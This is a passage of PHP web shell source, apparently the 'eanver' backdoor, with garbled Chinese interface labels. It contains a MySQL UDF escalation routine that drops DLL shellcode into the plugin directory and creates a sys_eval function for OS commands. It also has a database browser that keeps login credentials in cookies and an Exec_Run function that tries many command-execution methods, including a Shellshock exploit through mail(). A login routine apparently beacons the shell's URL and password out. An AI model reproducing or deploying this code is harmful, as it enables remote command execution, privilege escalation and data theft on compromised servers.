$_POST[\'mport\']; $mpath = File_Str($_POST[\'mpath\']); $sqlcmd = $_POST[\'sqlcmd\'];\r\n\t\t$conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass);\r\n\t\tif($conn)\r\n\t\t{\r\n\t\t\t@mysql_select_db($mdata);\r\n\t\t\t/*************************************/\r\n\t\t\t$str=mysql_get_server_info();\r\n\t\t\t//echo \'MYSQL汾:\'.$str."  ";\r\n\r\n\t\t\tif($str[2]>=1){\r\n\t\t\t$sql="SHOW VARIABLES LIKE \'%plugin_dir%\'";\r\n\t\t\t$row=mysql_query($sql,$conn);\r\n\t\t\t$rows=mysql_fetch_row($row);\r\n\t\t\t$pa=str_replace(\'\\\\\',\'/\',$rows[1]);\r\n\t\t\t$path=$pa.$BH;\r\n\r\n\t\t\t}else{\r\n\t\t\t$path=\'C:/WINDOWS/\'.$BH;\r\n\t\t\t}\r\n\t\t\t//$mpath=$path;\r\n\t\t\tif(!empty($mpath))\r\n\t\t\t{\r\n\t\t\t\t$mpath=$mpath;\r\n\t\t\t}else{\r\n\t\t\t\t$mpath=$path;\r\n\t\t\t}\r\n\t\t\t/*************************************/\r\n\t\t\tif((!empty($_POST[\'outdll\'])) && (!empty($mpath)))\r\n\t\t\t{\r\n\t\t\t\t$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";\r\n\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t{\r\n\t\t\t\t\t$shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();\r\n\t\t\t\t\t$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";\r\n\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$query = \'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \\\'\'.$mpath.\'\\\';\';\r\n\t\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t$ap = explode(\'/\', $mpath); $inpath = array_pop($ap);\r\n\t\t\t\t\t\t\t$query = \'Create Function sys_eval returns string soname \\\'\'.$inpath.\'\\\';\';\r\n\t\t\t\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'װDLLɹ\' : \'װDLLʧ\'.mysql_error();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse $MSG_BOX = \'DLLļʧ\'.mysql_error();\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse $MSG_BOX = \'дʱʧ\';\r\n\t\t\t\t\t@mysql_query(\'DROP TABLE Envl_Temp_Tab;\',$conn);\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t\t\t}\r\n\t\t\tif(!empty($_POST[\'runcmd\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'select sys_eval("\'.$sqlcmd.\'");\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\tif($result)\r\n\t\t\t\t{\r\n\t\t\t\t\t$k = 0; $info = NULL;\r\n\t\t\t\t\twhile($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}\r\n\t\t\t\t\t$info = $infotmp;\r\n\t\t\t\t\t$MSG_BOX = \'ִгɹ\';\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'ִʧ\';\r\n\t\t\t}\r\n\t\t}\r\n\t\telse $MSG_BOX = \'MYSQLʧ\';\r\n\t}\r\nprint<<<END\r\n<form id="mform" method="POST">\r\n<div id="msgbox" class="msgbox">{$MSG_BOX}</div>\r\n<center><div class="actall">\r\nַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">\r\n˿ <input type="text" name="mport" value="{$mport}" style="width:110px">\r\nû <input type="text" name="muser" value="{$muser}" style="width:110px">\r\n <input type="text" name="mpass" value="{$mpass}" style="width:110px">\r\n <input type="text" name="mdata" value="{$mdata}" style="width:110px">\r\n</div><div class="actall">\r\n·(Զȡ) <input type="text" id=\'dlllj\' name="mpath" value="{$mpath}" style="width:500px"> \r\n64λMYSQL <input type="checkbox" onclick="document.getElementById(\'dlllj\').value=\'\';" name="mysql64" value="1" {$mysql64} />\r\n<input type="submit" name="outdll" value="װDLL" style="width:80px;"></div>\r\n<div class="actall">ָ֧߰汾MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">\r\n<input type="submit" name="runcmd" value="ִ" style="width:80px;">\r\n<br />\r\n<pre>\r\n<textarea style="width:720px;height:300px;">{$info}</textarea>\r\n</pre>\r\n</div></center>\r\n</form>\r\nEND;\r\n\tbreak;\r\n\t\r\n\r\n\tcase "mysql_exec":\r\n  if(isset($_POST[\'mhost\']) && isset($_POST[\'mport\']) && isset($_POST[\'muser\']) && isset($_POST[\'mpass\']))\r\n  {\r\n  \tif(@mysql_connect($_POST[\'mhost\'].\':\'.$_POST[\'mport\'],$_POST[\'muser\'],$_POST[\'mpass\']))\r\n\t  {\r\n\t  \t$cookietime = time() + 24 * 3600;\r\n\t  \tsetcookie(\'m_eanverhost\',$_POST[\'mhost\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanverport\',$_POST[\'mport\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanveruser\',$_POST[\'muser\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanverpass\',$_POST[\'mpass\'],$cookietime);\r\n\t  \tdie(\'ڵ½,Ժ...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">\');\r\n\t  }\r\n  }\r\nprint<<<END\r\n<form method="POST" name="oform" id="oform">\r\n<div class="actall">ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>\r\n<div class="actall">˿ <input type="text" name="mport" value="3306" style="width:300px"></div>\r\n<div class="actall">û <input type="text" name="muser" value="root" style="width:300px"></div>\r\n<div class="actall"> <input type="text" name="mpass" value="" style="width:300px"></div>\r\n<div class="actall"><input type="submit" value="½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location=\'?eanver=mysql_msg\';"></div>\r\n</form>\r\nEND;\r\nbreak;\r\n\r\ncase "mysql_msg":\r\n\t$conn = @mysql_connect($_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'],$_COOKIE[\'m_eanveruser\'],$_COOKIE[\'m_eanverpass\']);\r\n\tif($conn)\r\n\t{\r\nprint<<<END\r\n<script language="javascript">\r\nfunction Delok(msg,gourl)\r\n{\r\n\tsmsg = "ȷҪɾ[" + unescape(msg) + "]?";\r\n\tif(confirm(smsg)){window.location = gourl;}\r\n\twindow.location = gourl;\r\n}\r\nfunction Createok(ac)\r\n{\r\n\tif(ac == \'a\') document.getElementById(\'nsql\').value = \'CREATE TABLE name (eanver BLOB);\';\r\n\tif(ac == \'b\') document.getElementById(\'nsql\').value = \'CREATE DATABASE name;\';\r\n\tif(ac == \'c\') document.getElementById(\'nsql\').value = \'DROP DATABASE name;\';\r\n\treturn false;\r\n}\r\nEND;\r\nhtml_base();\r\nprint<<<END\r\nfunction SubmitUrl(){\r\n\t\t\tdocument.getElementById(\'nsql\').value = base64encode(document.getElementById(\'nsql\').value);\r\n\t\t\tdocument.getElementById(\'gform\').submit();\r\n}\r\n</script>\r\nEND;\r\n\t\t$BOOL = false;\r\n\t\t$MSG_BOX = \'û:\'.$_COOKIE[\'m_eanveruser\'].\' &nbsp;&nbsp;&nbsp;&nbsp; ַ:\'.$_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'].\' &nbsp;&nbsp;&nbsp;&nbsp; 汾:\';\r\n\t\t$k = 0;\r\n\t\t$result = @mysql_query(\'select version();\',$conn);\r\n\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\techo \'<div class="actall"> ݿ:\';\r\n\t\t$result = mysql_query("SHOW DATABASES",$conn);\r\n\t\twhile($db = mysql_fetch_array($result)){echo \'&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db=\'.$db[\'Database\'].\'">\'.$db[\'Database\'].\'</a>]\';}\r\n\t\techo \'</div>\';\r\n\t\tif(isset($_GET[\'db\']))\r\n\t\t{\r\n\t\t\tmysql_select_db($_GET[\'db\'],$conn);\r\n            $_POST[\'nsql\']=base64_decode($_POST[\'nsql\']);\r\n\t\t\tif(!empty($_POST[\'nsql\'])){$BOOL = true; $MSG_BOX = mysql_query($_POST[\'nsql\'],$conn) ? \'ִгɹ\' : \'ִʧ \'.mysql_error();}\r\n\t\t\tif(is_array($_POST[\'insql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'INSERT INTO \'.$_GET[\'table\'].\' (\';\r\n\t\t\t\tforeach($_POST[\'insql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$querya .= $var.\',\';\r\n\t\t\t\t\t$queryb .= \'\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($querya, 0, -1).\') VALUES (\'.substr($queryb, 0, -1).\');\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'ӳɹ\' : \'ʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(is_array($_POST[\'upsql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'UPDATE \'.$_GET[\'table\'].\' SET \';\r\n\t\t\t\tforeach($_POST[\'upsql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$queryb .= $var.\'=\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($queryb, 0, -1).\' \'.base64_decode($_POST[\'wherevar\']).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'޸ĳɹ\' : \'޸ʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(isset($_GET[\'del\']))\r\n\t\t\t{\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'del\'].\', 1;\',$conn);\r\n\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t$query = \'DELETE FROM \'.$_GET[\'table\'].\' WHERE \';\r\n\t\t\t\tforeach($good as $var => $key){$queryc .= $var.\'=\\\'\'.addslashes($key).\'\\\' AND \';}\r\n\t\t\t\t$where = $query.substr($queryc, 0, -4).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($where,$conn) ? \'ɾɹ\' : \'ɾʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\t$action = \'?eanver=mysql_msg&db=\'.$_GET[\'db\'];\r\n\t\t\tif(isset($_GET[\'drop\'])){$query = \'Drop TABLE IF EXISTS \'.$_GET[\'drop\'].\';\';$MSG_BOX = mysql_query($query,$conn) ? \'ɾɹ\' : \'ɾʧ \'.mysql_error();}\r\n\t\t\tif(isset($_GET[\'table\'])){$action .= \'&table=\'.$_GET[\'table\'];if(isset($_GET[\'edit\'])) $action .= \'&edit=\'.$_GET[\'edit\'];}\r\n\t\t\tif(isset($_GET[\'insert\'])) $action .= \'&insert=\'.$_GET[\'insert\'];\r\n\t\t\techo \'<div class="actall"><form method="POST" action="\'.$action.\'" name="gform" id="gform">\';\r\n\t\t\techo \'<textarea name="nsql" id="nsql" style="width:500px;height:50px;">\'.$_POST[\'nsql\'].\'</textarea> \';\r\n\t\t\techo \'<input type="button" name="querysql" value="ִ" onclick="SubmitUrl();" style="width:60px;height:49px;">\';\r\n\t\t\techo \'<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\\\'a\\\')"> \';\r\n\t\t\techo \'<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\\\'b\\\')"> \';\r\n\t\t\techo \'<input type="button" value="ɾ" style="width:60px;height:49px;" onclick="Createok(\\\'c\\\')"></form></div>\';\r\n\t\t\techo \'<div class="msgbox" style="height:40px;">\'.$MSG_BOX.\'</div><div class="actall"><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'">\'.$_GET[\'db\'].\'</a> ---> \';\r\n\t\t\tif(isset($_GET[\'table\']))\r\n\t\t\t{\r\n\t\t\t\techo \'<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'">\'.$_GET[\'table\'].\'</a> \';\r\n\t\t\t\techo \'[<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&insert=\'.$_GET[\'table\'].\'"></a>]</div>\';\r\n\t\t\t\tif(isset($_GET[\'edit\']))\r\n\t\t\t\t{\r\n\t\t\t\t\tif(isset($_GET[\'p\'])) $atable = $_GET[\'table\'].\'&p=\'.$_GET[\'p\']; else $atable = $_GET[\'table\'];\r\n\t\t\t\t\techo \'<form method="POST" action="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$atable.\'">\';\r\n\t\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'edit\'].\', 1;\',$conn);\r\n\t\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t\t$u = 0;\r\n\t\t\t\t\tforeach($good as $var => $key)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$queryc .= $var.\'=\\\'\'.$key.\'\\\' AND \';\r\n\t\t\t\t\t\t$type = @mysql_field_type($result, $u);\r\n\t\t\t\t\t\t$len = @mysql_field_len($result, $u);\r\n\t\t\t\t\t\techo \'<div class="actall">\'.$var.\' <font color="#FF0000">\'.$type.\'(\'.$len.\')</font><br><textarea name="upsql[\'.$var.\']" style="width:600px;height:60px;">\'.htmlspecialchars($key).\'</textarea></div>\';\r\n\t\t\t\t\t\t$u++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$where = \'WHERE \'.substr($queryc, 0, -4);\r\n\t\t\t\t\techo \'<input type="hidden" id="wherevar" name="wherevar" value="\'.base64_encode($where).\'">\';\r\n\t\t\t\t\techo \'<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>\';\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$query = \'SHOW COLUMNS FROM \'.$_GET[\'table\'];\r\n\t\t      $result = mysql_query($query,$conn);\r\n\t\t      $fields = array();\r\n\t\t\t  $pagesize=20;\r\n\t\t      $row_num = mysql_num_rows(mysql_query(\'SELECT * FROM \'.$_GET[\'table\'],$conn));\r\n\t\t\t  $numrows=$row_num;\r\n              $pages=intval($numrows/$pagesize);\r\n              if ($numrows%$pagesize) $pages++;\r\n              $offset=$pagesize*($page - 1);\r\n              $page=$_GET[\'p\'];\r\n              if(!$page) $page=1;\r\n\r\n\t\t      if(!isset($_GET[\'p\'])){$p = 0;$_GET[\'p\'] = 1;} else $p = ((int)$_GET[\'p\']-1)*20;\r\n\t\t\t\t\techo \'<table border="0"><tr>\';\r\n\t\t\t\t\techo \'<td class="toptd" style="width:70px;" nowrap></td>\';\r\n\t\t\t\t\twhile($row = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tarray_push($fields,$row[\'Field\']);\r\n\t\t\t\t\t\techo \'<td class="toptd" nowrap>\'.$row[\'Field\'].\'</td>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\tif(eregi(\'WHERE|LIMIT\',$_POST[\'nsql\']) && eregi(\'SELECT|FROM\',$_POST[\'nsql\'])) $query = $_POST[\'nsql\']; else $query = \'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$p.\', 20;\';\r\n\t\t\t\t\t$result = mysql_query($query,$conn);\r\n\t\t\t\t\t$v = $p;\r\n\t\t\t\t\twhile($text = @mysql_fetch_assoc($result))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\techo \'<tr><td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'&p=\'.$_GET[\'p\'].\'&edit=\'.$v.\'"> ޸ </a> \';\r\n\t\t\t\t\t\techo \'<a href="#" onclick="Delok(\\\'\\\',\\\'?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'table\'].\'&p=\'.$_GET[\'p\'].\'&del=\'.$v.\'\\\');return false;"> ɾ </a></td>\';\r\n\t\t\t\t\t\tforeach($fields as $row){echo \'<td>\'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).\'</td>\';}\r\n\t\t\t\t\t\techo \'</tr>\'."\\r\\n";$v++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \'</table><div class="actall">\';\r\n                    $pagep=$page-1;\r\n                    $pagen=$page+1;\r\n                    echo " ".$row_num." ¼ ";\r\n                    if($pagep>0) $pagenav.="  <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=1&charset=".$_GET[\'charset\']."\'>ҳ</a> <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pagep."&charset=".$_GET[\'charset\']."\'>һҳ</a> "; else $pagenav.=" һҳ ";\r\n                    if($pagen<=$pages) $pagenav.=" <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pagen."&charset=".$_GET[\'charset\']."\'>һҳ</a> <a href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=".$pages."&charset=".$_GET[\'charset\']."\'>βҳ</a>"; else $pagenav.=" һҳ ";\r\n                    $pagenav.="  [".$page."/".$pages."] ҳ   <input name=\'textfield\' type=\'text\' style=\'text-align:center;\' size=\'4\' value=\'".$page."\' onkeydown=\\"if(event.keyCode==13)self.location.href=\'?eanver=mysql_msg&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."&p=\'+this.value+\'&charset=".$_GET[\'charset\']."\';\\" />ҳ";\r\n                    echo $pagenav;\r\n\t\t\t\t\techo \'</div>\';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telseif(isset($_GET[\'insert\']))\r\n\t\t\t{\r\n\t\t\t\techo \'<a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'insert\'].\'">\'.$_GET[\'insert\'].\'</a></div>\';\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'insert\'],$conn);\r\n\t\t\t\t$fieldnum = @mysql_num_fields($result);\r\n\t\t\t\techo \'<form method="POST" action="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$_GET[\'insert\'].\'">\';\r\n\t\t\t\tfor($i = 0;$i < $fieldnum;$i++)\r\n\t\t\t\t{\r\n\t\t\t\t\t$name = @mysql_field_name($result, $i);\r\n\t\t\t\t\t$type = @mysql_field_type($result, $i);\r\n\t\t\t\t\t$len = @mysql_field_len($result, $i);\r\n\t\t\t\t\techo \'<div class="actall">\'.$name.\' <font color="#FF0000">\'.$type.\'(\'.$len.\')</font><br><textarea name="insql[\'.$name.\']" style="width:600px;height:60px;"></textarea></div>\';\r\n\t\t\t\t}\r\n\t\t\t\techo \'<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>\';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$query = \'SHOW TABLE STATUS\';\r\n\t\t\t\t$status = @mysql_query($query,$conn);\r\n\t\t\t\twhile($statu = @mysql_fetch_array($status))\r\n\t\t\t\t{\r\n\t\t\t\t\t$statusize[] = $statu[\'Data_length\'];\r\n\t\t\t\t\t$statucoll[] = $statu[\'Collation\'];\r\n\t\t\t\t}\r\n\t\t\t\t$query = \'SHOW TABLES FROM \'.$_GET[\'db\'].\';\';\r\n\t\t\t\techo \'</div><table border="0"><tr>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:550px;">  </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:80px;">  </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:130px;"> ַ </td>\';\r\n\t\t\t\techo \'<td class="toptd" style="width:70px;"> С </td></tr>\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\t$k = 0;\r\n\t\t\t\twhile($table = mysql_fetch_row($result))\r\n\t\t\t\t{\r\n\t\t\t\t\t$charset=substr($statucoll[$k],0,strpos($statucoll[$k],\'_\'));\r\n\t\t\t\t\techo \'<tr><td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&table=\'.$table[0].\'">\'.$table[0].\'</a></td>\';\r\n\t\t\t\t\techo \'<td><a href="?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&insert=\'.$table[0].\'">  </a> <a href="#" onclick="Delok(\\\'\'.$table[0].\'\\\',\\\'?eanver=mysql_msg&db=\'.$_GET[\'db\'].\'&drop=\'.$table[0].\'\\\');return false;"> ɾ </a></td>\';\r\n\t\t\t\t\techo \'<td>\'.$statucoll[$k].\'</td><td align="right">\'.File_Size($statusize[$k]).\'</td></tr>\'."\\r\\n";\r\n\t\t\t\t\t$k++;\r\n\t\t\t\t}\r\n\t\t\t\techo \'</table>\';\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse die(\'MYSQLʧ,µ½.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">\');\r\n\tif(!$BOOL and addslashes($query)!=\'\') echo \'<script type="text/javascript">document.getElementById(\\\'nsql\\\').value = \\\'\'.addslashes($query).\'\\\';</script>\';\r\nbreak;\r\n\r\n\t\r\n\tdefault: html_main($path,$shellname); break;\r\n}\r\ncss_foot();\r\n\r\n/*---doing---*/\r\n\r\nfunction do_write($file,$t,$text)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($file,$t);\r\n\tif(!@fwrite($handle,$text))\r\n\t{\r\n\t\t@chmod($file,0666);\r\n\t\t$key = @fwrite($handle,$text) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction do_show($filepath){\r\n\t$show = array();\r\n\t$dir = dir($filepath);\r\n\twhile($file = $dir->read()){\r\n\t\tif($file == \'.\' or $file == \'..\') continue;\r\n\t\t$files = str_path($filepath.\'/\'.$file);\r\n\t\t$show[] = $files;\r\n\t}\r\n\t$dir->close();\r\n\treturn $show;\r\n}\r\n\r\nfunction do_deltree($deldir){\r\n\t$showfile = do_show($deldir);\r\n\tforeach($showfile as $del){\r\n\t\tif(is_dir($del)){ \r\n\t\t\tif(!do_deltree($del)) return false;\r\n\t\t}elseif(!is_dir($del)){\r\n\t\t\t@chmod($del,0777);\r\n\t\t\tif(!@unlink($del)) return false;\r\n\t\t}\r\n\t}\r\n\t@chmod($deldir,0777);\r\n\tif(!@rmdir($deldir)) return false;\r\n\treturn true;\r\n}\r\n\r\nfunction do_showsql($query,$conn){\r\n\t$result = @mysql_query($query,$conn);\r\n\thtml_n(\'<br><br><textarea cols="70" rows="15">\');\r\n\twhile($row = @mysql_fetch_array($result)){\r\n\t\tfor($i=0;$i < @mysql_num_fields($result);$i++){\r\n\t\t\thtml_n(htmlspecialchars($row[$i]));\r\n\t\t}\r\n\t}\r\n\thtml_n(\'</textarea>\');\r\n}\r\n\r\nfunction hmlogin($xiao=1){\r\n$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n$serverp = postpass;\r\nif (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE[\'serveru\'] and $serverp==$_COOKIE[\'serverp\'])) {echo "<meta http-equiv=\'refresh\' content=\'0;URL=?\'>";} else {setcookie(\'serveru\',$serveru);setcookie(\'serverp\',$serverp);if($xiao==1){echo "<script src=\'?login=geturl\'></script><meta http-equiv=\'refresh\' content=\'0;URL=?\'>";}else{geturl();}}\r\n}\r\n\r\nfunction do_down($fd){\r\n\tif(!@file_exists($fd)) msg(\'ļ\');\r\n\t$fileinfo = pathinfo($fd);\r\n\theader(\'Content-type: application/x-\'.$fileinfo[\'extension\']);\r\n\theader(\'Content-Disposition: attachment; filename=\'.$fileinfo[\'basename\']);\r\n\theader(\'Content-Length: \'.filesize($fd));\r\n\t@readfile($fd);\r\n\texit;\r\n}\r\n\r\nfunction do_download($filecode,$file){\r\n\theader("Content-type: application/unknown");\r\n\theader(\'Accept-Ranges: bytes\');\r\n\theader("Content-length: ".strlen($filecode));\r\n\theader("Content-disposition: attachment; filename=".$file.";");\r\n\techo $filecode;\r\n\texit;\r\n}\r\n\r\nfunction TestUtf8($text)\r\n{if(strlen($text) < 3) return false;\r\n$lastch = 0;\r\n$begin = 0;\r\n$BOM = true;\r\n$BOMchs = array(0xEF, 0xBB, 0xBF);\r\n$good = 0;\r\n$bad = 0;\r\n$notAscii = 0;\r\nfor($i=0; $i < strlen($text); $i++)\r\n{$ch = ord($text[$i]);\r\nif($begin < 3)\r\n{ $BOM = ($BOMchs[$begin]==$ch);\r\n$begin += 1;\r\ncontinue; }\r\nif($begin==4 && $BOM) break;\r\nif($ch >= 0x80 ) $notAscii++;\r\nif( ($ch&0xC0) == 0x80 )\r\n{if( ($lastch&0xC0) == 0xC0 )\r\n{$good += 1;}\r\nelse if( ($lastch&0x80) == 0 )\r\n{$bad += 1; }}\r\nelse if( ($lastch&0xC0) == 0xC0 )\r\n{$bad += 1;}\r\n$lastch = $ch;}\r\nif($begin == 4 && $BOM)\r\n{return 2;}\r\nelse if($notAscii==0)\r\n{return 1;}\r\nelse if ($good >= $bad )\r\n{return 2;}\r\nelse\r\n{return 0;}}\r\n\r\nfunction File_Str($string)\r\n{\r\n\treturn str_replace(\'//\',\'/\',str_replace(\'\\\\\',\'/\',$string));\r\n}\r\n\r\nfunction File_Write($filename,$filecode,$filemode)\r\n{\r\n\t$key = true;\r\n\t$handle = @fopen($filename,$filemode);\r\n\tif(!@fwrite($handle,$filecode))\r\n\t{\r\n\t\t@chmod($filename,0666);\r\n\t\t$key = @fwrite($handle,$filecode) ? true : false;\r\n\t}\r\n\t@fclose($handle);\r\n\treturn $key;\r\n}\r\n\r\nfunction Exec_Run($cmd)\r\n{\r\n\t$res = \'\';\r\n\tif(function_exists(\'exec\')){@exec($cmd,$res);$res = join("\\n",$res);}\r\n\telseif(function_exists(\'shell_exec\')){$res = @shell_exec($cmd);}\r\n\telseif(function_exists(\'system\')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(function_exists(\'passthru\')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}\r\n\telseif(@is_resource($f=@popen($cmd,\'r\'))){$res = \'\';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}\r\n\telseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists(\'COM\')){$w=new COM(\'WScript.shell\');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}\r\n\telseif(function_exists(\'proc_open\')){$length = strcspn($cmd," \\t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array(\'pipe\', \'w\'),2 => array(\'pipe\', \'w\')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, \'UTF-8\');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, \'UTF-8\');}fclose($io[1]);fclose($io[2]);proc_close($p);}\r\n\telseif(function_exists(\'mail\')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}\r\n\treturn $res;\r\n}\r\n\r\nfunction File_Mode()\r\n{\r\n\t$RealPath = realpath(\'./\');\r\n\t$SelfPath = $_SERVER[\'PHP_SELF\'];\r\n\t$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,\'/\'));\r\n\treturn File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));\r\n}\r\n\r\nfunction GetFileOwner($File) {\r\n\t\tif(PATH_SEPARATOR==\':\'){\r\n\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t$File = posix_getpwuid(fileowner($File));\r\n\t\t\t}\r\n\t\t\treturn $File[\'name\'];\r\n\t\t}\r\n}\r\n\r\nfunction GetFileGroup($File) {\r\n\t\tif(PATH_SEPARATOR==\':\'){\r\n            if(function_exists(\'posix_getgrgid\')) {\r\n\t\t\t$File = posix_getgrgid(filegroup($File));\r\n\t\t\t}\r\n\t\t\treturn $File[\'name\'];\r\n\t\t}\r\n}\r\n\r\nfunction File_Size($size)\r\n{ \r\n        $kb = 1024;       \r\n        $mb = 1024 * $kb;  \r\n        $gb = 1024 * $mb; \r\n        $tb = 1024 * $gb;  \r\n        if($size < $kb)\r\n        {\r\n            return $size." B";\r\n        }\r\n        else if($size < $mb)\r\n        { \r\n            return round($size/$kb,2)." K";\r\n        }\r\n        else if($size < $gb)\r\n        { \r\n            return round($size/$mb,2)." M";\r\n        }\r\n        else if($size < $tb)\r\n        { \r\n            return round($size/$gb,2)." G";\r\n        }\r\n        else\r\n        { \r\n            return round($size/$tb,2)." T";\r\n        }\r\n }\r\n\r\nfunction File_Read($filename)\r\n{\r\n\t$handle = @fopen($filename,"rb");\r\n\t$filecode = @fread($handle,@filesize($filename));\r\n\t@fclose($handle);\r\n\treturn $filecode;\r\n}\r\n\r\nfunction array_iconv($data,  $output = \'utf-8\') {  \r\n    $encode_arr = 